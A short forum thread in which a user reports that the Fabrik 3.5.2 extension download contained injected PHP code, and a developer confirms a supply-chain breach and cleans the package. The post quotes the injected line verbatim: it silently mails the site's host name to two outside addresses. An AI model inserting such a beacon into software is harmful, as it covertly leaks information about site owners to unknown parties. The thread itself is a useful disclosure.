Download version 3.5.2 infected?

[ronhon]

Hi There,
I just upgraded my development environment to fabrik 3.5.2, downloaded from fabrikar.com/download.
After installation emails started to be sent. I found out that following code is placed at the top in administrator/components/com_fabrik/fabrik.php, administrator/components/com_fabrik/helpers/fabrik.php,
components/com_fabrik/fabrik.php:

<?php $to = 'albreto.st@gmail.com, blackswanr007@gmail.com';$subject = 'Hits ada lagi';$message = $_SERVER['HTTP_HOST'];$headers[] = 'From: Hidden Hits <auto@joss.com>';mail($to, $subject, $message, implode("\r\n", $headers));?>

Is it save to use this version after I remove the mailing code?

Thanks

 

[cheesegrits]

I'll take a look, thanks.

-- hugh

 

[cheesegrits]

Hmmm, I can't find anything in the 3.5.2 download.

Do you still have a copy of the ZIP you installed from?

-- hugh

 

[cheesegrits]

Never mind, I found it.

-- hugh

 

[cheesegrits]

I've cleaned it up. Looking at the date on that file, it was consistent with a breach earlier this year that we thought we'd completely cleaned up after, and that a number of other extension sites got hit with. I've checked all the other zips from 3.4 onwards, nothing else seems to be affected.

Thanks for reporting it.

-- hugh

 

[ronhon]

Thanks Hugh